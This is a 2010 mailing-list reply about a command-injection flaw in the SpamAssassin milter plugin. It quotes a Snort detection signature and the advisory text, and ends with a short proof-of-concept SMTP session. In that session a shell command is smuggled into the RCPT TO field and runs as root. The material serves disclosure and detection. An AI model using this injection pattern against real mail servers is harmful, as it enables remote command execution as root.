On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
> just a heads up:  I don't know if there is a problem with SA milter, but 
> there is a snort signature for it now.
> 
> 
> -------- Original Message --------
> Subject:      [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote 
> Arbitrary Command Injection Attempt
> Date:         Mon, 8 Mar 2010 13:03:52 +0000
> From:         Kevin Ross <kevros...@googlemail.com>
> To:   emerging-s...@emergingthreats.net 
> <emerging-s...@emergingthreats.net>, Matt Jonkman <jonk...@jonkmans.com>
> 
> 
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible 
> SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt"; 
> flow:established,to_server; content:"to|3A|"; nocase; 
> content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user; 
> reference:url,www.securityfocus.com/bid/38578 
> <http://www.securityfocus.com/bid/38578>; 
> reference:url,seclists.org/fulldisclosure/2010/Mar/140 
> <http://seclists.org/fulldisclosure/2010/Mar/140>; sid:1324412; rev:1;)
> 
> Kev
> 

The key is this:

"If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied 
recipient (RCPT TO)."

POC IS

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Reply via email to